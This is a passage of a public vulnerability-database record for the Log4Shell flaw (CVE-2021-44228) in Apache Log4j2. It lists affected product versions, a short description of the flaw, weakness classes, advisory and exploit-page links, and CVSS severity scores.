"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:snowsoftware:vm_access_proxy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:snowsoftware:snow_commander:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.10.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:bentley:synchro_4d:*:*:*:*:pro:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.2.4.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:bentley:synchro:*:*:*:*:pro:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.4.3.2",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:percussion:rhythmyx:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.3.2",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-44228"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-400"
},
{
"lang": "en",
"value": "CWE-502"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://logging.apache.org/log4j/2.x/security.html",
"refsource": "MISC",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"tags": [
"Vendor Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"tags": [
"Third Party Advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"refsource": "FEDORA",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "https://twitter.com/kurtseifried/status/1469345530182455296",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "DSA-5020",
"refsource": "DEBIAN",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "VU#930724",
"refsource": "CERT-VN",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"name": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"refsource": "MS",
"tags": [
"Patch",
"Third Party Advisory",
"Vendor Advisory"
],
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"name": "FEDORA-2021-66d6c484f3",
"refsource": "FEDORA",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md",
"refsource": "MISC",
"tags": [
"Product",
"US Government Resource"
],
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "https://www.oracle.com/security-alerts/cpujan2022.html",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"name": "https://github.com/cisagov/log4j-affected-db",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"name": "https://support.apple.com/kb/HT213189",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT213189"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"refsource": "FULLDISC",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"refsource": "FULLDISC",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"refsource": "FULLDISC",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [],
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6.0
}
},
"lastModifiedDate": "2023-04-03T20:15Z",
"publishedDate": "2021-12-10T10:15Z"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.